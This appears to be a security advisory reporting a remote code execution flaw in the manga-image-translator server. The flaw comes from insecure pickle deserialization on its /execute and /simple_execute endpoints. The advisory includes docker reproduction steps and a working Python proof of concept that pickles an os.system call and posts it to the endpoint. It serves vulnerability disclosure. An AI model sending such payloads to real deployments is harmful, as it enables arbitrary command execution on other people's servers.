### Key Information #### Vulnerability Description - **Type**: RCE (Remote Code Execution) due to insecure Pickle deserialization - **Affected Project**: zyddnys/manga-image-translator - **Affected Endpoints**: - `/execute/{method_name}` - `/simple_execute/{method_name}` #### Reproduction Steps - **Example Endpoint**: `/execute/{method_name}` - **Run Command**: ```bash docker run \ --name manga_image_translator_cpu \ -p 5003:5003 \ -p 5004:5004 --ipc=host \ --entrypoint python \ --rm \ -v /data1/projects/githubsrc/manga-image-translator/result:/app/result \ -v /data1/projects/githubsrc/manga-image-translator/server/main.py:/app/server/main.py \ -v /data1/projects/githubsrc/manga-image-translator/server/instance.py:/app/server/instance.py \ -e OPENAI_API_KEY='' \ -e OPENAI_API_BASE='' \ -e OPENAI_MODEL='' \ zyddnys/manga-image-translator:main \ server/main.py --verbose --start-instance --host=0.0.0.0 --port=5003 ``` - **POC Code**: ```python import pickle import os import requests class PickleRCE(object): def __reduce__(self): command = "whoami" return (os.system, (command,)) serialized_data = pickle.dumps(PickleRCE()) url = "http://127.0.0.1:5004/execute/translate" headers = {"Content-Type": "application/octet-stream"} response = requests.post( url, headers=headers, data=serialized_data ) print(f"Status Code: {response.status_code}") print(f"Response Content: {response.text}") ``` #### Docker Logs - **Error Message**: `INFO: 172.17.0.1:37888 - "POST /execute/translate HTTP/1.1" 500 Internal Server Error` #### Impact - **Impact**: RCE (Remote Code Execution) #### Discoverer - **Discoverer**: Tencent YunDing Security Lab